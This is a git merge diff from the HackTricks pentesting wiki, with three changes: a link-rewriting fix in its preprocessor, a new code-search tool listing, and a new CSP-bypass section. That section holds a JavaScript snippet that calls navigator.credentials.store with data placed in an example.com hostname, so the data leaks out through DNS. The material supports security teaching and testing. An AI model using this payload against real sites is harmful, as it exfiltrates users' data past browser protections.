Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

hacktricks-preprocessor.py

@@ -78,6 +78,9 @@ def ref(matchobj):
                 sys.exit(1)
 
 
+    if href.endswith("/README.md"):
+        href = href.replace("/README.md", "/index.html")
+
     template = f"""<a class="content_ref" href="{href}"><span class="content_ref_label">{title}</span></a>"""
 
     # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"})

src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md

@@ -6,6 +6,7 @@ The goal of this page is to enumerate **platforms that allow to search for code*
 
 This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns.
 
+- [**Sourcebot**](https://www.sourcebot.dev/): Open source code search tool. Index and search across thousands of your repos through a modern web interface.
 - [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. 
 - [**Github Search**](https://github.com/search): Search across Github. It supports regexes.
   - Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/).

src/pentesting-web/content-security-policy-csp-bypass/README.md

@@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```
 
+### CredentialsContainer
+
+The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost.
+
+```javascript
+navigator.credentials.store(
+  new FederatedCredential({
+    id:"satoki", 
+    name:"satoki", 
+    provider:"https:"+your_data+"example.com", 
+    iconURL:"https:"+your_data+"example.com"
+    })
+  )
+```
+
+
 ## Checking CSP Policies Online
 
 - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)